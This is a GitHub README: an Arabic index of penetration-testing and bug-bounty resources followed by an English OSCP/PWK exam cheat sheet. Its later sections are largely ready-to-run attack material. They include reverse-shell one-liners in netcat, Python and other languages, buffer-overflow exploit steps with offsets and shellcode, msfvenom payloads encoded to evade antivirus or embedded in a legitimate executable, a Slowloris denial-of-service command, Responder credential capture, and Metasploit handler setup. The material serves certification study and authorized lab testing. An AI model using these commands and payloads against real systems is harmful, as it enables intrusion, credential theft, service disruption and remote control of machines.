> <p dir='rtl' align='right'> الكثير من الراغبين في الدخول في مجال اختبار الاختراق PT أو مجال اصطياد الثغرات BugBounty يتسائلون كيف هي البداية؟ وكيف أقوم بعملية اختبار الاختراق؟.وكيف أقوم باصطياد الثغرات والإبلاغِ عنها والحصول على مكافأة؟. ولا شك أن هناك الكثير من المصادر المتوفرة على الإنترنت وبشكل مجاني. لذلك قمت بجمعها هنا كي يسهل عليك التعلم والاستفادة منها بالشكل الصحيح.وأنا على ثقة أن هناك أدوات كثيرة قد لا أستطيع حصرها إلا بتعاونكم لذلك إذا وجدت أي منها وترغب باضافتها فضلًا قم بالتواصل معي.</p>
<h4 dir='rtl' align='right'>#الاصدار الحالي 11/2021</h4>
<h4 dir='rtl' align='right'>current verison 2021/11#</h4>
## <h3 dir='rtl' align='right'>📚 جدول المحتويات </h3>
<p dir='rtl' align='right'>
- [<p dir='rtl' align='right'> ✅ نمذجة التهديدات السيبرانية اطار MITER | ATT&CK </p>](https://github.com/Malajab/incyber/blob/master/MITRE-ATT&CK-AR/README.md)
- [<p dir='rtl' align='right'> ✅ الاساسيات في اختبار الاختراق واصطياد الثغرات</p>](/assets/basics.md)
- [<p dir='rtl' align='right'> ✅ تثبيت انظمة التشغيل الخاصة باختبار الاختراق </p>](/assets/setup.md)
- [<p dir='rtl' align='right'> ✅ الادوات الخاصة باختبار الاختراق "PT" واصطياد الثغرات "BugBounty" </p>](/assets/tools.md)
- [<p dir='rtl' align='right'> ✅ مختبرات الاخترق</p>](/assets/labs.md)
- [<p dir='rtl' align='right'> ✅ منصات اصطياد الثغرات "BugBounty" المحلية والعالمية </p>](/assets/bugbountyplatfrom.md)
- [<p dir='rtl' align='right'> ✅ الثغرات</p>](/assets/vulns.md)
- [<p dir='rtl' align='right'> ✅ السكربتات والاكواد</p>](/assets/code.md)
- [<p dir='rtl' align='right'> ✅ المقالات و البحوث و اللقاءات وتقارير اصطياد الثغرات BugBounty </p>](/assets/blogposts.md)
- [<p dir='rtl' align='right'> ✅ الشهادات الاحترافية</p>](/assets/certs.md)
- [<p dir='rtl' align='right'> ✅ اسئلة و اجوبة للمبتدئين</p>](/questions.md)
- [<p dir='rtl' align='right'> ✅ نماذج وخطوات رفع تقارير مكافآة الثغرات BugBouty - Report</p>](/Template/bug-report.md)
- [<p dir='rtl' align='right'> ✅مركز العمليات السيبرانية المستوى الاول - SOC Level 1</p>](/SOC/level-1.md)
- [<p dir='rtl' align='right'> ✅ اطار OWASP TOP 10 باللغة العربية</p>](https://owasp.org/Top10/ar/)
- [<p dir='rtl' align='right'> ✅ اطار OWASP TOP 10 API باللغة العربية </p>](https://github.com/OWASP/API-Security/blob/master/2019/ar/dist/owasp-api-security-top-10-ar.pdf)
- [<p dir='rtl' align='right'> ✅ شركات الامن السيبراني الوطنية</p>](/resources/company.md)
## <h3 dir='rtl' align='right'>📤 الاقتراحات </h3>
[<p dir='rtl' align='right'> تواصل معنا على ديسكورد</p>](https://discord.gg/5MtNfwy)
|
# OSCP
OSCP cheatsheet by https://github.com/ibr2
# PWK-CheatSheet
<pre>
██▓███ █ ███ ▄█▀ ▄████▄ ██░ ██▓█████▄▄▄ ▄▄▄█████▓ ██████ ██░ ██▓█████▓████▄▄▄█████▓
▓██░ ██▓█░ █ ░███▄█▒ ▒██▀ ▀█ ▓██░ ██▓█ ▒████▄ ▓ ██▒ ▓▒ ▒██ ▒▓██░ ██▓█ ▀▓█ ▓ ██▒ ▓▒
▓██░ ██▓▒█░ █ ░▓███▄░ ▒▓█ ▄▒██▀▀██▒███ ▒██ ▀█▄▒ ▓██░ ▒░ ░ ▓██▄ ▒██▀▀██▒███ ▒███ ▒ ▓██░ ▒░
▒██▄█▓▒ ░█░ █ ░▓██ █▄ ▒▓▓▄ ▄██░▓█ ░██▒▓█ ░██▄▄▄▄█░ ▓██▓ ░ ▒ ██░▓█ ░██▒▓█ ▄▒▓█ ░ ▓██▓ ░
▒██▒ ░ ░░██▒██▒██▒ █▄ ▒ ▓███▀ ░▓█▒░██░▒████▓█ ▓██▒▒██▒ ░ ▒██████▒░▓█▒░██░▒████░▒████▒▒██▒ ░
▒▓▒░ ░ ░ ▓░▒ ▒▒ ▒▒ ▓▒ ░ ░▒ ▒ ░▒ ░░▒░░░ ▒░ ▒▒ ▓▒█░▒ ░░ ▒ ▒▓▒ ▒ ░▒ ░░▒░░░ ▒░ ░░ ▒░ ░▒ ░░
░▒ ░ ▒ ░ ░░ ░▒ ▒░ ░ ▒ ▒ ░▒░ ░░ ░ ░▒ ▒▒ ░ ░ ░ ░▒ ░ ░▒ ░▒░ ░░ ░ ░░ ░ ░ ░
░░ ░ ░░ ░░ ░ ░ ░ ░░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░
</pre>
#### Penetration Testing with Kali Linux (PWK) course and Offensive Security Certified Professional (OSCP) Cheat Sheet
## Table of Contents
- [Linux 101](#linux-101)
- [Information Gathering & Vulnerability Scanning](#information-gathering--vulnerability-scanning)
* [Passive Information Gathering](#passive-information-gathering)
* [Active Information Gathering](#active-information-gathering)
* [Port Scanning](#port-scanning)
* [Enumeration](#enumeration)
* [HTTP Enumeration](#http-enumeration)
- [Buffer Overflows and Exploits](#buffer-overflows-and-exploits)
- [Shells](#shells)
- [File Transfers](#file-transfers)
- [Privilege Escalation](#privilege-escalation)
* [Linux Privilege Escalation](#linux-privilege-escalation)
* [Windows Privilege Escalation](#windows-privilege-escalation)
- [Client, Web and Password Attacks](#client-web-and-password-attacks)
* [Client Attacks](#client-attacks)
* [Web Attacks](#web-attacks)
* [File Inclusion Vulnerabilities LFI/RFI](#file-inclusion-vulnerabilities)
* [Database Vulnerabilities](#database-vulnerabilities)
* [Password Attacks](#password-attacks)
* [Password Hash Attacks](#password-hash-attacks)
- [Networking, Pivoting and Tunneling](#networking-pivoting-and-tunneling)
- [The Metasploit Framework](#the-metasploit-framework)
- [Bypassing Antivirus Software](#bypassing-antivirus-software)
Linux 101
===============================================================================================================================
# Set the Target IP Address to the $ip system variable
```shell
$ export ip=192.168.1.100
```
# Find the location of a file
```shell
$ locate sbd.exe
```
# Search through directories in the $PATH environment variable
```shell
$ which sbd
```
# Find a search for a file that contains a specific string in it’s name
```shell
$ find / -name sbd\*
```
# Show active internet connections
```shell
$ netstat -lntp
```
# Change Password
```shell
$ passwd
```
# Verify a service is running and listening
```shell
$ netstat -antp |grep apache
```
# Start a service
```shell
$ systemctl start ssh
$ systemctl start apache2
```
# Unzip a gz file
```shell
$ gunzip access.log.gz
```
# Unzip a tar.gz file
```shell
$ tar -xzvf file.tar.gz
```
- Search command history
```shell
history | grep phrase\_to\_search\_for
```
- Have a service start at boot
```shell
systemctl enable ssh
```
- Stop a service
`systemctl stop ssh`
- Download a webpage
`wget [www.cisco.com](http://www.cisco.com)`
- Open a webpage
`curl [www.cisco.com](http://www.cisco.com)
- String manipulation
- Count number of lines in file
`wc index.html`
- Get the start or end of a file
`head index.html `
`tail index.html`
- Extract all the lines that contain a string
`grep "href=" index.html`
- Cut a string by a delimiter, filter results then sort
`grep "href=" index.html | cut -d "/" -f 3 | grep "\\." | cut -d '"' -f 1 | sort -u`
- Using Grep and regular expressions and output to a file
`cat index.html | grep -o 'http://\[^"\]\*' | cut -d "/" -f 3 | sort –u > list.txt`
- Use a bash loop to find the IP address behind each host
`for url in $(cat list.txt); do host $url; done`
- Collect all the IP Addresses from a log file and sort by
frequency
`cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn`
- Netcat - Read and write TCP and UDP Packets
- Connect to a POP3 mail server
`nc -nv $ip 110`
- Listen on TCP/UDP port
`nc -nlvp 4444`
- Connect to a netcat port
`nc -nv $ip 4444`
- Send a file using netcat
`nc -nv $ip 4444 < /usr/share/windows-binaries/wget.exe`
- Receive a file using netcat
`nc -nlvp 4444 > incoming.exe`
- Create a reverse shell with Ncat using cmd.exe on Windows
`nc -nlvp 4444 -e cmd.exe`
- Create a reverse shell with Ncat using bash on Linux
`nc -nv $ip 4444 -e /bin/bash`
- Ncat - Netcat for Nmap project which provides more security avoid
IDS
- Reverse shell from windows using cmd.exe using ssl
`ncat --exec cmd.exe --allow $ip -vnl 4444 --ssl`
- Listen on port 4444 using ssl
`ncat -v $ip 4444 --ssl`
- Wireshark
- Show only SMTP (port 25) and ICMP traffic:
`tcp.port eq 25 or icmp`
- Show only traffic in the LAN (192.168.x.x), between workstations and servers -- no Internet:
`ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16`
- Filter by a protocol ( e.g. SIP ) and filter out unwanted IPs:
`ip.src != xxx.xxx.xxx.xxx && ip.dst != xxx.xxx.xxx.xxx && sip`
- Some commands are equal
`ip.addr == 10.43.54.65`
Equals
`ip.src == 10.43.54.65 or ip.dst == 10.43.54.65 `
` ip.addr != 10.43.54.65`
Equals
`ip.src != 10.43.54.65 or ip.dst != 10.43.54.65`
- Tcpdump
- Display a pcap file
`tcpdump -r password\_cracking\_filtered.pcap`
- Display ips and filter and sort
`tcpdump -n -r password\_cracking\_filtered.pcap | awk -F" " '{print $3}' | sort -u | head`
- Grab a packet capture on port 80
`tcpdump tcp port 80 -w output.pcap -i eth0`
- Check for ACK or PSH flag set in a TCP packet
`tcpdump -A -n 'tcp\[13\] = 24' -r password\_cracking\_filtered.pcap`
- IPTables deny traffic to ports except for Local Loopback
```shell
iptables -A INPUT -p tcp --destination-port 13327 \\! -d $ip -j DROP
iptables -A INPUT -p tcp --destination-port 4444 \\! -d $ip -j DROP
```
Information Gathering & Vulnerability Scanning
===============================================================================================================================
- Passive Information Gathering
---------------------------------------------------------------------------------------------------------------------------
- Google Hacking
- Google search to find website sub domains
`site:microsoft.com`
`site:[www.microsoft.com](http://www.microsoft.com)`
- Google filetype, and intitle
`intitle:”netbotz appliance” “OK” -filetype:pdf`
- Google inurl
`inurl:”level/15/sexec/-/show”`
- Google Hacking Database:
https://www.exploit-db.com/google-hacking-database/
- SSL Certificate Testing
[*https://www.ssllabs.com/ssltest/analyze.html*](https://www.ssllabs.com/ssltest/analyze.html)
- Email Harvesting
- Simply Email
`git clone https://github.com/killswitch-GUI/SimplyEmail.git `
`./SimplyEmail.py -all -e TARGET-DOMAIN`
- Netcraft
- Determine the operating system and tools used to build a site
https://searchdns.netcraft.com/
- Whois Enumeration
`whois domain-name-here.com `
`whois $ip`
- Banner Grabbing
- `nc -v $ip 25`
- `telnet $ip 25`
- `nc TARGET-IP 80`
- Recon-ng - full-featured web reconnaissance framework written in Python
- `cd /opt; git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git `
`cd /opt/recon-ng `
`./recon-ng `
`show modules `
`help`
- Active Information Gathering
--------------------------------------------------------------------------------------------------------------------------
<!-- -->
- DNS Enumeration
- Host Lookup
`host -t ns megacorpone.com`
- Reverse Lookup Brute Force - find domains in the same range
`for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"`
- Perform DNS IP Lookup
`dig a domain-name-here.com @nameserver`
- Perform MX Record Lookup
`dig mx domain-name-here.com @nameserver`
- Perform Zone Transfer with DIG
`dig axfr domain-name-here.com @nameserver`
- DNS Zone Transfers
Windows DNS zone transfer
`nslookup -> set type=any -> ls -d blah.com `
Linux DNS zone transfer
`dig axfr blah.com @ns1.blah.com`
- Dnsrecon DNS Brute Force
`dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml`
- Dnsrecon DNS List of megacorp
`dnsrecon -d megacorpone.com -t axfr`
- DNSEnum
`dnsenum zonetransfer.me`
- Port Scanning
-----------------------------------------------------------------------------------------------------------
*Subnet Reference Table*
/ | Addresses | Hosts | Netmask | Amount of a Class C
--- | --- | --- | --- | ---
/30 | 4 | 2 | 255.255.255.252| 1/64
/29 | 8 | 6 | 255.255.255.248 | 1/32
/28 | 16 | 14 | 255.255.255.240 | 1/16
/27 | 32 | 30 | 255.255.255.224 | 1/8
/26 | 64 | 62 | 255.255.255.192 | 1/4
/25 | 128 | 126 | 255.255.255.128 | 1/2
/24 | 256 | 254 | 255.255.255.0 | 1
/23 | 512 | 510 | 255.255.254.0 | 2
/22 | 1024 | 1022 | 255.255.252.0 | 4
/21 | 2048 | 2046 | 255.255.248.0 | 8
/20 | 4096 | 4094 | 255.255.240.0 | 16
/19 | 8192 | 8190 | 255.255.224.0 | 32
/18 | 16384 | 16382 | 255.255.192.0 | 64
/17 | 32768 | 32766 | 255.255.128.0 | 128
/16 | 65536 | 65534 | 255.255.0.0 | 256
- Set the ip address as a varble
`export ip=192.168.1.100 `
`nmap -A -T4 -p- $ip`
- Netcat port Scanning
`nc -nvv -w 1 -z $ip 3388-3390`
- Discover who else is on the network
`netdiscover`
- Discover IP Mac and Mac vendors from ARP
`netdiscover -r $ip/24`
- Nmap stealth scan using SYN
`nmap -sS $ip`
- Nmap stealth scan using FIN
`nmap -sF $ip`
- Nmap Banner Grabbing
`nmap -sV -sT $ip`
- Nmap OS Fingerprinting
`nmap -O $ip`
- Nmap Regular Scan:
`nmap $ip/24`
- Enumeration Scan
`nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt`
- Enumeration Scan All Ports TCP / UDP and output to a txt file
`nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip`
- Nmap output to a file:
`nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24`
- Quick Scan:
`nmap -T4 -F $ip/24`
- Quick Scan Plus:
`nmap -sV -T4 -O -F --version-light $ip/24`
- Quick traceroute
`nmap -sn --traceroute $ip`
- All TCP and UDP Ports
`nmap -v -sU -sS -p- -A -T4 $ip`
- Intense Scan:
`nmap -T4 -A -v $ip`
- Intense Scan Plus UDP
`nmap -sS -sU -T4 -A -v $ip/24`
- Intense Scan ALL TCP Ports
`nmap -p 1-65535 -T4 -A -v $ip/24`
- Intense Scan - No Ping
`nmap -T4 -A -v -Pn $ip/24`
- Ping scan
`nmap -sn $ip/24`
- Slow Comprehensive Scan
`nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" $ip/24`
- Scan with Active connect in order to weed out any spoofed ports designed to troll you
`nmap -p1-65535 -A -T5 -sT $ip`
- Enumeration
-----------
- NMap Enumeration Script List:
- NMap Discovery
[*https://nmap.org/nsedoc/categories/discovery.html*](https://nmap.org/nsedoc/categories/discovery.html)
- Nmap port version detection MAXIMUM power
`nmap -vvv -A --reason --script="+(safe or default) and not broadcast" -p <port> <host>`
-
- SMB Enumeration
- SMB OS Discovery
`nmap $ip --script smb-os-discovery.nse`
- Nmap port scan
`nmap -v -p 139,445 -oG smb.txt $ip-254`
- Netbios Information Scanning
`nbtscan -r $ip/24`
- Nmap find exposed Netbios servers
`nmap -sU --script nbstat.nse -p 137 $ip`
- SMB Enumeration Tools
`nmblookup -A $ip `
`smbclient //MOUNT/share -I $ip -N `
`rpcclient -U "" $ip `
`enum4linux $ip `
`enum4linux -a $ip`
- SMB Finger Printing
`smbclient -L //$ip`
- Nmap Scan for Open SMB Shares
`nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 $ip/24`
- Nmap scans for vulnerable SMB Servers
`nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 $ip`
- Nmap List all SMB scripts installed
`ls -l /usr/share/nmap/scripts/smb\*`
- Enumerate SMB Users
- `nmap -sU -sS --script=smb-enum-users -p U:137,T:139 $ip-14`
- `python /usr/share/doc/python-impacket-doc/examples /samrdump.py $ip`
- RID Cycling - Null Sessions
[*https://www.trustedsec.com/march-2013/new-tool-release-rpc\_enum-rid-cycling-attack/*](https://www.trustedsec.com/march-2013/new-tool-release-rpc_enum-rid-cycling-attack/)
- `ridenum.py $ip 500 50000 dict.txt`
- `use auxiliary/scanner/smb/smb\_lookupsid`
- Manual Null Session Testing
- Windows: `net use \\\\$ip\\IPC$ "" /u:""`
- Linux: `smbclient -L //$ip`
- LLMNR / NBT-NS Spoofing - Steal credentials off the network.
- Spoof / poison LLMNR / NetBIOS requests:
auxiliary/spoof/llmnr/llmnr\_response
auxiliary/spoof/nbns/nbns\_response
- Capture the hashes:
auxiliary/server/capture/smb
auxiliary/server/capture/http\_ntlm
- Using Responder to Steal Creds
`git clone https://github.com/SpiderLabs/Responder.git `
`python Responder.py -i local-ip -I eth0`
- SMTP Enumeration - Mail Severs
- Verify SMTP port using Netcat
`nc -nv $ip 25`
- SNMP Enumeration -Simple Network Management Protocol
- Fix SNMP output values so they are human readable
`apt-get install snmp-mibs-downloader download-mibs `
`echo "" > /etc/snmp/snmp.conf`
- SNMP Enumeration Commands
- `snmpcheck -t $ip -c public`
- `snmpwalk -c public -v1 $ip 1|`
- `grep hrSWRunName|cut -d\* \* -f`
- `snmpenum -t $ip`
- `onesixtyone -c names -i hosts`
- SNMPv3 Enumeration
`nmap -sV -p 161 --script=snmp-info $ip/24`
- Automate the username enumeration process for SNMPv3:
`apt-get install snmp snmp-mibs-downloader `
`wget <https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb>`
- SNMP Default Credentials
/usr/share/metasploit-framework/data/wordlists/snmp\_default\_pass.txt
- Linux OS Enumeration
- List all SUID files
`find / -perm -4000 2>/dev/null`
- Determine the current version of Linux
`cat /etc/issue`
- Determine more information about the environment
`uname -a`
- List processes running
`ps -xaf`
- List the allowed (and forbidden) commands for the invoking use
`sudo -l`
- List iptables rules
`iptables --table nat --list
iptables -vL -t filter
iptables -vL -t nat
iptables -vL -t mangle
iptables -vL -t raw
iptables -vL -t security`
- Windows OS Enumeration
- net config Workstation
- systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
- hostname
- net users
- ipconfig /all
- route print
- arp -A
- netstat -ano
- netsh firewall show state
- netsh firewall show config
- schtasks /query /fo LIST /v
- tasklist /SVC
- net start
- DRIVERQUERY
- reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
- reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
- dir /s *pass* == *cred* == *vnc* == *.config*
- findstr /si password *.xml *.ini *.txt
- reg query HKLM /f password /t REG_SZ /s
- reg query HKCU /f password /t REG_SZ /s
- Vulnerability Scanning with Nmap
- Nmap Exploit Scripts
[*https://nmap.org/nsedoc/categories/exploit.html*](https://nmap.org/nsedoc/categories/exploit.html)
- Nmap search through vulnerability scripts
`cd /usr/share/nmap/scripts/
ls -l \*vuln\*`
- Nmap search through Nmap Scripts for a specific keyword
`ls /usr/share/nmap/scripts/\* | grep ftp`
- Scan for vulnerable exploits with nmap
`nmap --script exploit -Pn $ip`
- NMap Auth Scripts
[*https://nmap.org/nsedoc/categories/auth.html*](https://nmap.org/nsedoc/categories/auth.html)
- Nmap Vuln Scanning
[*https://nmap.org/nsedoc/categories/vuln.html*](https://nmap.org/nsedoc/categories/vuln.html)
- NMap DOS Scanning
`nmap --script dos -Pn $ip
NMap Execute DOS Attack
nmap --max-parallelism 750 -Pn --script http-slowloris --script-args
http-slowloris.runforever=true`
- Scan for coldfusion web vulnerabilities
`nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip`
- Anonymous FTP dump with Nmap
`nmap -v -p 21 --script=ftp-anon.nse $ip-254`
- SMB Security mode scan with Nmap
`nmap -v -p 21 --script=ftp-anon.nse $ip-254`
- File Enumeration
- Find UID 0 files root execution
- `/usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\; 2>/dev/null`
- Get handy linux file system enumeration script (/var/tmp)
`wget <https://highon.coffee/downloads/linux-local-enum.sh> `
`chmod +x ./linux-local-enum.sh `
`./linux-local-enum.sh`
- Find executable files updated in August
`find / -executable -type f 2> /dev/null | egrep -v "^/bin|^/var|^/etc|^/usr" | xargs ls -lh | grep Aug`
- Find a specific file on linux
`find /. -name suid\*`
- Find all the strings in a file
`strings <filename>`
- Determine the type of a file
`file <filename>`
- HTTP Enumeration
----------------
- Search for folders with gobuster:
`gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip`
- OWasp DirBuster - Http folder enumeration - can take a dictionary file
- Dirb - Directory brute force finding using a dictionary file
`dirb http://$ip/ wordlist.dict `
`dirb <http://vm/> `
Dirb against a proxy
- `dirb [http://$ip/](http://172.16.0.19/) -p $ip:3129`
- Nikto
`nikto -h $ip`
- HTTP Enumeration with NMAP
`nmap --script=http-enum -p80 -n $ip/24`
- Nmap Check the server methods
`nmap --script http-methods --script-args http-methods.url-path='/test' $ip`
- Get Options available from web server
`curl -vX OPTIONS vm/test`
- Uniscan directory finder:
`uniscan -qweds -u <http://vm/>`
- Wfuzz - The web brute forcer
`wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test `
`wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ `
`wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ"`
<!-- -->
- Open a service using a port knock (Secured with Knockd)
for x in 7000 8000 9000; do nmap -Pn --host\_timeout 201
--max-retries 0 -p $x server\_ip\_address; done
- WordPress Scan - Wordpress security scanner
- wpscan --url $ip/blog --proxy $ip:3129
- RSH Enumeration - Unencrypted file transfer system
- auxiliary/scanner/rservices/rsh\_login
- Finger Enumeration
- finger @$ip
- finger batman@$ip
- TLS & SSL Testing
- ./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U $ip | aha >
OUTPUT-FILE.html
- Proxy Enumeration (useful for open proxies)
- nikto -useproxy http://$ip:3128 -h $ip
- Steganography
> apt-get install steghide
>
> steghide extract -sf picture.jpg
>
> steghide info picture.jpg
>
> apt-get install stegosuite
- The OpenVAS Vulnerability Scanner
- apt-get update
apt-get install openvas
openvas-setup
- netstat -tulpn
- Login at:
https://$ip:9392
Buffer Overflows and Exploits
===================================================================================================================================
- DEP and ASLR - Data Execution Prevention (DEP) and Address Space
Layout Randomization (ASLR)
- MSFvenom
[*https://www.offensive-security.com/metasploit-unleashed/msfvenom/*](https://www.offensive-security.com/metasploit-unleashed/msfvenom/)
- Windows Buffer Overflows
- Controlling EIP
- locate pattern\_create
- pattern\_create.rb -l 2700
- locate pattern\_offset
- pattern\_offset.rb -q 39694438
- Verify exact location of EIP - \[\*\] Exact match at offset 2606
- buffer = "A" \* 2606 + "B" \* 4 + "C" \* 90
- Check for “Bad Characters” - Run multiple times 0x00 - 0xFF
- Use Mona to determine a module that is unprotected
- Bypass DEP if present by finding a Memory Location with Read and
Execute access for JMP ESP
- Otherwise without DEP, we can stick our
- Use NASM to determine the HEX code for a JMP ESP instruction
- /usr/share/metasploit-framework/tools/exploit/nasm\_shell.rb
- JMP ESP
00000000 FFE4 jmp esp
- Run Mona in immunity log window to find (FFE4) XEF command
- !mona find -s "\\xff\\xe4" -m slmfc.dll
found at 0x5f4a358f - Flip around for little endian format
- buffer = "A" \* 2606 + "\\x8f\\x35\\x4a\\x5f" + "C" \* 390
- MSFVenom to create payload
msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=443 -f c
–e x86/shikata\_ga\_nai -b "\\x00\\x0a\\x0d"
- Final Payload with NOP slide
buffer="A"\*2606 + "\\x8f\\x35\\x4a\\x5f" + "\\x90" \* 8 +
shellcode
- Create a PE Reverse Shell
msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444
-f
exe -o shell\_reverse.exe
- Create a PE Reverse Shell and Encode 9 times with
Shikata\_ga\_nai
msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444
-f
exe -e x86/shikata\_ga\_nai -i 9 -o
shell\_reverse\_msf\_encoded.exe
- Create a PE reverse shell and embed it into an existing
executable
msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444 -f
exe -e x86/shikata\_ga\_nai -i 9 -x
/usr/share/windows-binaries/plink.exe -o
shell\_reverse\_msf\_encoded\_embedded.exe
- Create a PE Reverse HTTPS shell
msfvenom -p windows/meterpreter/reverse\_https LHOST=$ip
LPORT=443 -f exe -o met\_https\_reverse.exe
- Linux Buffer Overflows
- Run Evans Debugger against an app
edb --run /usr/games/crossfire/bin/crossfire
- ESP register points toward the end of our CBuffer
add eax,12
jmp eax
83C00C add eax,byte +0xc
FFE0 jmp eax
- Check for “Bad Characters” Process of elimination - Run multiple
times 0x00 - 0xFF
- Find JMP ESP address
"\\x97\\x45\\x13\\x08" \# Found at Address 08134597
- crash = "\\x41" \* 4368 + "\\x97\\x45\\x13\\x08" +
"\\x83\\xc0\\x0c\\xff\\xe0\\x90\\x90"
- msfvenom -p linux/x86/shell\_bind\_tcp LPORT=4444 -f c -b
"\\x00\\x0a\\x0d\\x20" –e x86/shikata\_ga\_nai
- Connect to the shell with netcat:
nc -v $ip 4444
Shells
===============================================================================================================================
- Netcat Shell Listener
nc -nlvp 443
- Spawning a TTY Shell - Break out of Jail or limited shell
You should almost always upgrade your shell after taking control of an apache or www user.
(For example when you encounter an error message when trying to run an exploit sh: no job control in this shell )
(hint: sudo -l to see what you can run)
- python -c 'import pty; pty.spawn("/bin/sh")'
- python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);
s.connect(("$ip",1234));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(\["/bin/sh","-i"\]);'
- echo os.system('/bin/bash')
- /bin/sh -i
- perl —e 'exec "/bin/sh";'
- perl: exec "/bin/sh";
- ruby: exec "/bin/sh"
- lua: os.execute('/bin/sh')
- (From within IRB)
exec "/bin/sh"
- (From within vi)
:!bash
- From within vim
Breaking out of vim is done by ':!bash':
- (From within vi)
:set shell=/bin/bash:shell
- (From within nmap)
!sh
- (From within tcpdump)
echo $’id\\n/bin/netcat $ip 443 –e /bin/bash’ >
/tmp/.test
chmod +x /tmp/.test
sudo tcpdump –ln –I eth- -w /dev/null –W 1 –G 1 –z /tmp/.tst
–Z root
- from busybox
/bin/busybox telnetd -|/bin/sh -p9999
- Pen test monkey PHP reverse shell
[*http://pentestmonkey.net/tools/web-shells/php-reverse-shel*](http://pentestmonkey.net/tools/web-shells/php-reverse-shell)
- php-findsock-shell - turns PHP port 80 into an interactive shell
[*http://pentestmonkey.net/tools/web-shells/php-findsock-shell*](http://pentestmonkey.net/tools/web-shells/php-findsock-shell)
- Perl Reverse Shell
[*http://pentestmonkey.net/tools/web-shells/perl-reverse-shell*](http://pentestmonkey.net/tools/web-shells/perl-reverse-shell)
- PHP powered web browser Shell b374k with file upload etc.
[*https://github.com/b374k/b374k*](https://github.com/b374k/b374k)
- Windows reverse shell - PowerSploit’s Invoke-Shellcode script and inject a Meterpreter shell
https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1
- Web Backdoors from Fuzzdb (
https://github.com/fuzzdb-project/fuzzdb/tree/master/web-backdoors
- Creating Meterpreter Shells with MSFVenom - http://www.securityunlocked.com/2016/01/02/network-security-pentesting/most-useful-msfvenom-payloads/
*Linux*
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
*Windows*
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
*Mac*
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
**Web Payloads**
*PHP*
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
*ASP*
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
*JSP*
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
*WAR*
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
**Scripting Payloads**
*Python*
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
*Bash*
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
*Perl*
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
**Shellcode**
For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
*Linux Based Shellcode*
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
*Windows Based Shellcode*
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
*Mac Based Shellcode*
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
**Handlers**
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z
Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘
- SSH to Meterpreter:
use auxiliary/scanner/ssh/ssh_login
use post/multi/manage/shell_to_meterpreter
